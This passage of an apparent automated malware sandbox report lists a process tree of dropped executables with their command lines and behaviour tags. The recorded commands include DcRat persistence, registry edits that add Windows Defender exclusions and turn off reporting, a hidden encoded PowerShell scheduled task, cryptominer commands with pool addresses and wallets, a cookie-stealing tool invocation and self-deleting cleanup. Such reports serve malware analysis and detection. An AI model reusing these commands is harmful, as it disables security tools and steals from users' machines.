        Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,2055854308275403205,394250286108235205,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2080 /prefetch:2
      C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2088,2055854308275403205,394250286108235205,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2312 /prefetch:3
        - Suspicious behavior: EnumeratesProcesses
  C:\Users\Admin\AppData\Local\Temp\KRSetp.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\KRSetp.exe"
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1wNij7
    - Adds Run key to start application
    - Enumerates system info in registry
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of WriteProcessMemory
    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffadc5b46f8,0x7ffadc5b4708,0x7ffadc5b4718
    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,5957700545920764839,18030284229587334367,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2156 /prefetch:2
    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2144,5957700545920764839,18030284229587334367,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 /prefetch:3
      - Suspicious behavior: EnumeratesProcesses
    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2144,5957700545920764839,18030284229587334367,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2608 /prefetch:8
    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,5957700545920764839,18030284229587334367,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3524 /prefetch:1
    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,5957700545920764839,18030284229587334367,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3532 /prefetch:1
    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,5957700545920764839,18030284229587334367,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4344 /prefetch:1
    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2144,5957700545920764839,18030284229587334367,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5244 /prefetch:8
    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,5957700545920764839,18030284229587334367,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5708 /prefetch:1
    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,5957700545920764839,18030284229587334367,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5724 /prefetch:1
    C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
      - Drops file in Program Files directory
      C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
        Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x228,0x22c,0x230,0x204,0x234,0x7ff752365460,0x7ff752365470,0x7ff752365480
    C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2144,5957700545920764839,18030284229587334367,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6284 /prefetch:8
    C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2144,5957700545920764839,18030284229587334367,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6284 /prefetch:8
    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,5957700545920764839,18030284229587334367,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3208 /prefetch:2
  C:\Users\Admin\AppData\Local\Temp\Folder.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\Folder.exe"
    - Executes dropped EXE
    - Checks computer location settings
    - Modifies registry class
    - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\rUNdlL32.eXe
      Command line: "C:\Windows\system32\rUNdlL32.eXe" "C:\Users\Admin\AppData\Local\Temp\axhub.dll",axhub
      - Loads dropped DLL
      C:\Windows\SysWOW64\WerFault.exe
        Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 3296 -s 600
        - Program crash
  C:\Users\Admin\AppData\Local\Temp\Info.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\Info.exe"
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
  C:\Users\Admin\AppData\Local\Temp\File.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\File.exe"
    - Executes dropped EXE
    - Checks computer location settings
    - Suspicious use of SetWindowsHookEx
    C:\Users\Admin\Documents\T0jlrpsGGUYr4eISutfzJGw3.exe
      Command line: "C:\Users\Admin\Documents\T0jlrpsGGUYr4eISutfzJGw3.exe"
      - Executes dropped EXE
      - Suspicious use of SetWindowsHookEx
      C:\Windows\SysWOW64\WerFault.exe
        Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 5404 -s 460
        - Program crash
      C:\Windows\SysWOW64\WerFault.exe
        Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 5404 -s 480
        - Program crash
    C:\Users\Admin\Documents\6mM5wc4MNICotg_rhaS83KUX.exe
      Command line: "C:\Users\Admin\Documents\6mM5wc4MNICotg_rhaS83KUX.exe"
      - Executes dropped EXE
      - Suspicious use of SetWindowsHookEx
      C:\Windows\SysWOW64\WerFault.exe
        Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 5536 -s 476
        - Program crash
      C:\Windows\SysWOW64\WerFault.exe
        Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 5536 -s 496
        - Program crash
    C:\Users\Admin\Documents\vUSKLYkUlN7iZZdPiIOcfRq9.exe
      Command line: "C:\Users\Admin\Documents\vUSKLYkUlN7iZZdPiIOcfRq9.exe"
      - Executes dropped EXE
      - Loads dropped DLL
      - Suspicious use of SetWindowsHookEx
      C:\Windows\SysWOW64\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" /c taskkill /im vUSKLYkUlN7iZZdPiIOcfRq9.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\vUSKLYkUlN7iZZdPiIOcfRq9.exe" & del C:\ProgramData\*.dll & exit
        C:\Windows\SysWOW64\taskkill.exe
          Command line: taskkill /im vUSKLYkUlN7iZZdPiIOcfRq9.exe /f
          - Kills process with taskkill
        C:\Windows\SysWOW64\timeout.exe
          Command line: timeout /t 6
          - Delays execution with timeout.exe
    C:\Users\Admin\Documents\8LYdi6ebdnfzHFB1_bWgzJGK.exe
      Command line: "C:\Users\Admin\Documents\8LYdi6ebdnfzHFB1_bWgzJGK.exe"
      - Executes dropped EXE
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - Suspicious use of SetWindowsHookEx
    C:\Users\Admin\Documents\fhvct4NKRv1MuwyM8AyODJx_.exe
      Command line: "C:\Users\Admin\Documents\fhvct4NKRv1MuwyM8AyODJx_.exe"
      - DcRat
      - Executes dropped EXE
      - Checks computer location settings
      - Adds Run key to start application
      - Drops file in System32 directory
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - Drops file in Program Files directory
      - Suspicious use of SetWindowsHookEx
      C:\Windows\SysWOW64\cmmon32\conhost.exe
        Command line: "C:\Windows\System32\cmmon32\conhost.exe"
        - Executes dropped EXE
        - Suspicious use of NtSetInformationThreadHideFromDebugger
        - Suspicious use of SetWindowsHookEx
    C:\Users\Admin\Documents\iCvrT7Kt4p0VQnPOaAK1bUuw.exe
      Command line: "C:\Users\Admin\Documents\iCvrT7Kt4p0VQnPOaAK1bUuw.exe"
      - Executes dropped EXE
      - Checks computer location settings
      C:\Users\Admin\AppData\Local\Temp\3aa92756-575d-46ac-926b-6b220ed24ba3.exe
        Command line: "C:\Users\Admin\AppData\Local\Temp\3aa92756-575d-46ac-926b-6b220ed24ba3.exe"
        - Executes dropped EXE
        - Checks processor information in registry
    C:\Users\Admin\Documents\hxK9HRML3gADcksTmKKPtJTV.exe
      Command line: "C:\Users\Admin\Documents\hxK9HRML3gADcksTmKKPtJTV.exe"
      - Executes dropped EXE
      C:\Windows\SysWOW64\WerFault.exe
        Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 5636 -s 624
        - Program crash
      C:\Windows\SysWOW64\WerFault.exe
        Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 5636 -s 632
        - Program crash
      C:\Windows\SysWOW64\WerFault.exe
        Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 5636 -s 652
        - Program crash
      C:\Windows\SysWOW64\WerFault.exe
        Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 5636 -s 800
        - Program crash
      C:\Windows\SysWOW64\WerFault.exe
        Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 5636 -s 1244
        - Program crash
      C:\Windows\SysWOW64\WerFault.exe
        Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 5636 -s 1252
        - Program crash
      C:\Windows\SysWOW64\WerFault.exe
        Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 5636 -s 1212
        - Program crash
      C:\Windows\SysWOW64\WerFault.exe
        Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 5636 -s 1244
        - Program crash
      C:\Windows\SysWOW64\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" /c taskkill /im "hxK9HRML3gADcksTmKKPtJTV.exe" /f & erase "C:\Users\Admin\Documents\hxK9HRML3gADcksTmKKPtJTV.exe" & exit
        C:\Windows\SysWOW64\taskkill.exe
          Command line: taskkill /im "hxK9HRML3gADcksTmKKPtJTV.exe" /f
          - Kills process with taskkill
      C:\Windows\SysWOW64\WerFault.exe
        Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 5636 -s 1104
        - Program crash
    C:\Users\Admin\Documents\3zrdpp1YNurQ9BvFo_I16hXV.exe
      Command line: "C:\Users\Admin\Documents\3zrdpp1YNurQ9BvFo_I16hXV.exe"
      - Executes dropped EXE
      C:\Windows\system32\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\Users\Admin\Documents\3zrdpp1YNurQ9BvFo_I16hXV.exe
        C:\Windows\system32\choice.exe
          Command line: choice /C Y /N /D Y /T 0
    C:\Users\Admin\Documents\xnPfNBTqQGpxzwtTAJgl0Pwi.exe
      Command line: "C:\Users\Admin\Documents\xnPfNBTqQGpxzwtTAJgl0Pwi.exe"
      - Executes dropped EXE
      - Suspicious use of SetWindowsHookEx
      C:\Windows\SysWOW64\WerFault.exe
        Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 5736 -s 460
        - Program crash
      C:\Windows\SysWOW64\WerFault.exe
        Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 5736 -s 480
        - Program crash
    C:\Users\Admin\Documents\xtqmxtTKWEfE8t8uqfXbvBNB.exe
      Command line: "C:\Users\Admin\Documents\xtqmxtTKWEfE8t8uqfXbvBNB.exe"
      - Executes dropped EXE
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - Suspicious use of SetWindowsHookEx
    C:\Users\Admin\Documents\eYWJfcyLudf_is8eTK_AhCIG.exe
      Command line: "C:\Users\Admin\Documents\eYWJfcyLudf_is8eTK_AhCIG.exe"
      - Executes dropped EXE
      C:\Users\Admin\AppData\Local\Temp\Wsctpfnlhslasrsaigeprim.exe
        Command line: "C:\Users\Admin\AppData\Local\Temp\Wsctpfnlhslasrsaigeprim.exe"
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        Command line: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    C:\Users\Admin\Documents\QM0VjrM43wjfbjwxlnNpeiLt.exe
      Command line: "C:\Users\Admin\Documents\QM0VjrM43wjfbjwxlnNpeiLt.exe"
      - Executes dropped EXE
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - Suspicious use of SetWindowsHookEx
      C:\Users\Admin\AppData\Local\Temp\A59L1.exe
        Command line: "C:\Users\Admin\AppData\Local\Temp\A59L1.exe"
      C:\Users\Admin\AppData\Local\Temp\KJAC6.exe
        Command line: "C:\Users\Admin\AppData\Local\Temp\KJAC6.exe"
        - Executes dropped EXE
        - Suspicious use of NtSetInformationThreadHideFromDebugger
        - Suspicious use of SetWindowsHookEx
      C:\Users\Admin\AppData\Local\Temp\BFE5C.exe
        Command line: "C:\Users\Admin\AppData\Local\Temp\BFE5C.exe"
        - Executes dropped EXE
        - Suspicious use of NtSetInformationThreadHideFromDebugger
        - Suspicious use of SetWindowsHookEx
      C:\Users\Admin\AppData\Local\Temp\57F2H.exe
        Command line: "C:\Users\Admin\AppData\Local\Temp\57F2H.exe"
        - Executes dropped EXE
        - Adds Run key to start application
        - Suspicious use of NtSetInformationThreadHideFromDebugger
        - Suspicious use of SetWindowsHookEx
      C:\Users\Admin\AppData\Local\Temp\1CILB.exe
        Command line: "C:\Users\Admin\AppData\Local\Temp\1CILB.exe"
        - Executes dropped EXE
        - Suspicious use of SetWindowsHookEx
        C:\Windows\SysWOW64\control.exe
          Command line: "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\QYNVYce.CpL",
          C:\Windows\SysWOW64\rundll32.exe
            Command line: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\QYNVYce.CpL",
            C:\Windows\system32\RunDll32.exe
              Command line: C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\QYNVYce.CpL",
              C:\Windows\SysWOW64\rundll32.exe
                Command line: "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Temp\QYNVYce.CpL",
      C:\Users\Admin\AppData\Local\Temp\1CILB33H9E8BCC5.exe
        Command line: https://iplogger.org/1nChi7
        - Executes dropped EXE
        - Modifies Internet Explorer settings
        - Suspicious use of SetWindowsHookEx
    C:\Users\Admin\Documents\BJEsf_U8Nn986YcrD7DpuoI2.exe
      Command line: "C:\Users\Admin\Documents\BJEsf_U8Nn986YcrD7DpuoI2.exe"
      - Executes dropped EXE
      - Suspicious use of SetWindowsHookEx
    C:\Users\Admin\Documents\75BsMTOUWXlbqzaIQpyJ6if7.exe
      Command line: "C:\Users\Admin\Documents\75BsMTOUWXlbqzaIQpyJ6if7.exe"
      - Executes dropped EXE
      - Loads dropped DLL
      - Checks processor information in registry
      - Suspicious use of SetWindowsHookEx
      C:\Users\Admin\AppData\Local\Temp\MicrosoftLibs\Ei8DrAmaYu9K8ghN89Cs.exe
        Command line: "C:\Users\Admin\AppData\Local\Temp\MicrosoftLibs\Ei8DrAmaYu9K8ghN89Cs.exe"
        C:\Windows\bfsvc.exe
          Command line: C:\Windows\bfsvc.exe -a TON --pool wss://eu1.stratum.ton-pool.com/stratum --user UQBoMIYmX6zYTKyRLaph1PjCMfxSLWTbiAw_qqTHLnbMhzWF
          C:\Windows\System32\Conhost.exe
            Command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        C:\Windows\notepad.exe
          Command line: C:\Windows\notepad.exe --coin=XMR -o xmr-eu1.nanopool.org:14444 -u 44W9eLcymm66Eie5AyD11jYW1DaJ4GTHzZEu1QELPGS3U9vKtWEyUCaCFwhn4af8zjeQ2MWeuLgCVDTjAjiGUbyYAtQBvC1 -p 10k instllov
          C:\Windows\system32\WerFault.exe
            Command line: C:\Windows\system32\WerFault.exe -u -p 5912 -s 440
            - Program crash
          C:\Windows\system32\WerFault.exe
            Command line: C:\Windows\system32\WerFault.exe -u -p 5912 -s 484
            - Program crash
        C:\Windows\explorer.exe
          Command line: C:\Windows\explorer.exe "easyminer_def" "Microsoft%20Basic%20Display%20Adapter" "new" "ton"
          C:\Windows\System32\Conhost.exe
            Command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          C:\Windows\system32\WerFault.exe
            Command line: C:\Windows\system32\WerFault.exe -u -p 4488 -s 260
            - Program crash
      C:\Users\Admin\AppData\Local\Temp\MicrosoftLibs\jOW1D87fZN3R3jFe02zd.exe
        Command line: "C:\Users\Admin\AppData\Local\Temp\MicrosoftLibs\jOW1D87fZN3R3jFe02zd.exe"
        C:\Windows\bfsvc.exe
          Command line: C:\Windows\bfsvc.exe -a TON --pool wss://eu1.stratum.ton-pool.com/stratum --user UQBoMIYmX6zYTKyRLaph1PjCMfxSLWTbiAw_qqTHLnbMhzWF
        C:\Windows\notepad.exe
          Command line: C:\Windows\notepad.exe --coin=XMR -o xmr-eu1.nanopool.org:14444 -u 44W9eLcymm66Eie5AyD11jYW1DaJ4GTHzZEu1QELPGS3U9vKtWEyUCaCFwhn4af8zjeQ2MWeuLgCVDTjAjiGUbyYAtQBvC1 -p 10k instllov
          C:\Windows\system32\WerFault.exe
            Command line: C:\Windows\system32\WerFault.exe -u -p 4528 -s 440
            - Program crash
          C:\Windows\system32\WerFault.exe
            Command line: C:\Windows\system32\WerFault.exe -u -p 4528 -s 448
            - Program crash
        C:\Windows\explorer.exe
          Command line: C:\Windows\explorer.exe "easyminer_def" "Microsoft%20Basic%20Display%20Adapter" "new" "ton"
          C:\Windows\system32\WerFault.exe
            Command line: C:\Windows\system32\WerFault.exe -u -p 1688 -s 260
            - Program crash
    C:\Users\Admin\Documents\9FJLQu4A_WqLnwf6TNi2ThAm.exe
      Command line: "C:\Users\Admin\Documents\9FJLQu4A_WqLnwf6TNi2ThAm.exe"
      - Executes dropped EXE
      - Checks computer location settings
      - Suspicious use of SetWindowsHookEx
    C:\Users\Admin\Documents\gsRqUqtuYTRkYMiJYJ0ZdsHq.exe
      Command line: "C:\Users\Admin\Documents\gsRqUqtuYTRkYMiJYJ0ZdsHq.exe"
      - Executes dropped EXE
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - Suspicious use of SetWindowsHookEx
    C:\Users\Admin\Documents\XB562pl90hdu1ztAiENZv8ad.exe
      Command line: "C:\Users\Admin\Documents\XB562pl90hdu1ztAiENZv8ad.exe"
      - Executes dropped EXE
    C:\Users\Admin\Documents\DyxVIXsNsKer_eZTImK_hMIG.exe
      Command line: "C:\Users\Admin\Documents\DyxVIXsNsKer_eZTImK_hMIG.exe"
      - Executes dropped EXE
      - Suspicious use of SetWindowsHookEx
      C:\Users\Admin\AppData\Local\Temp\7zSB91.tmp\Install.exe
        Command line: .\Install.exe
        - Executes dropped EXE
        - Suspicious use of SetWindowsHookEx
        C:\Users\Admin\AppData\Local\Temp\7zS2DDF.tmp\Install.exe
          Command line: .\Install.exe /S /site_id "525403"
          - Executes dropped EXE
          - Checks BIOS information in registry
          - Checks computer location settings
          - Drops file in System32 directory
          - Enumerates system info in registry
          - Suspicious use of SetWindowsHookEx
          C:\Windows\SysWOW64\forfiles.exe
            Command line: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
            C:\Windows\SysWOW64\cmd.exe
              Command line: /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
              \??\c:\windows\SysWOW64\reg.exe
                Command line: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
              \??\c:\windows\SysWOW64\reg.exe
                Command line: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
          C:\Windows\SysWOW64\forfiles.exe
            Command line: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
            C:\Windows\SysWOW64\cmd.exe
              Command line: /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
              \??\c:\windows\SysWOW64\reg.exe
                Command line: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
              \??\c:\windows\SysWOW64\reg.exe
                Command line: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
          C:\Windows\SysWOW64\schtasks.exe
            Command line: schtasks /CREATE /TN "gyJkcnhJQ" /SC once /ST 00:46:02 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
            - DcRat
            - Creates scheduled task(s)
          C:\Windows\SysWOW64\schtasks.exe
            Command line: schtasks /run /I /tn "gyJkcnhJQ"
          C:\Windows\SysWOW64\schtasks.exe
            Command line: schtasks /DELETE /F /TN "gyJkcnhJQ"
          C:\Windows\SysWOW64\schtasks.exe
            Command line: schtasks /CREATE /TN "booXbIzkEgfNdKvxAC" /SC once /ST 22:04:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\Qpeovok.exe\" j6 /site_id 525403 /S" /V1 /F
            - DcRat
            - Creates scheduled task(s)
  C:\Users\Admin\AppData\Local\Temp\Install.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\Install.exe"
    - Executes dropped EXE
  C:\Users\Admin\AppData\Local\Temp\jg3_3uag.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\jg3_3uag.exe"
    - Executes dropped EXE
    - Checks whether UAC is enabled
  C:\Users\Admin\AppData\Local\Temp\Installation.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\Installation.exe"
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\cmd.exe
      Command line: cmd.exe /c taskkill /f /im chrome.exe
      - Suspicious use of WriteProcessMemory
      C:\Windows\SysWOW64\taskkill.exe
        Command line: taskkill /f /im chrome.exe
        - Kills process with taskkill
        - Suspicious use of AdjustPrivilegeToken
  C:\Users\Admin\AppData\Local\Temp\pzyh.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\pzyh.exe"
    - DcRat
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of WriteProcessMemory
    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
      Command line: C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
      - Executes dropped EXE
    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
      Command line: C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
      - Executes dropped EXE
      - Suspicious behavior: EnumeratesProcesses
  C:\Users\Admin\AppData\Local\Temp\pub2.exe
